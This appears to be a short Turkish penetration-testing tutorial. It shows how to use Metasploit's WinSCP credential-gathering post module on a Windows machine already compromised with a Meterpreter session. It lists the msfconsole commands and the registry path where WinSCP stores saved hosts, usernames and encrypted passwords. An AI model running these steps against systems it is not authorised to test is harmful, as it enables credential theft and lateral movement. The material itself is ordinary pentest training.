Meterpreter Bağlantısı Elde Edilmiş Olan Windows Bilgisayarda MSF winscp Post Modülü ile Winscp Uygulamasındaki Erişim Bilgilerinin Elde Edilmesi

0
22
views
Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarda kritik bilgi elde edilmeye çalışılır. Bu yazıda, Meterpreter erişimi elde edilmiş bir Windows istemcinin Winscp uygulamasında kayıtlı olan erişim bilgileri MSF winscp post modülü ile elde edilecektir.

W7 adlı bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF winscp post modülü ile Winscp uygulamasının içerisinde kayıtlı olan erişim bilgilerinin elde edilmesi için modül seçilir ve seçenekleri incelenir.

sessions
search winscp
use post/windows/gather/credentials/winscp
show options

acquiring-sensitive-logon-informations-on-winscp-client-by-using-msf-winscp-post-module-01

Modüle oturum ID değeri verilerek modül çalışıtırılır ve Winscp uygulamasında kayıtlı olan kimlik bilgileri ele geçirilir.

set SESSION 1
show options
run

acquiring-sensitive-logon-informations-on-winscp-client-by-using-msf-winscp-post-module-02

Not: Winscp uygulamasında kayıtlı erişim bilgileri, Kayıt Defteri üzerinde “HKEY_USERS\<KullaniciSID>\Software\Martin Prikryl\Winscp 2\Sessions” anahtarı altındaki anahtarlarda kayıtlıdır. Bağlantı kurulacak IP değeri ve kullanıcı adı bilgisi açık olarak saklanırken, parola bilgisi ise şifreli olarak saklanır.

acquiring-sensitive-logon-informations-on-winscp-client-by-using-msf-winscp-post-module-03

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz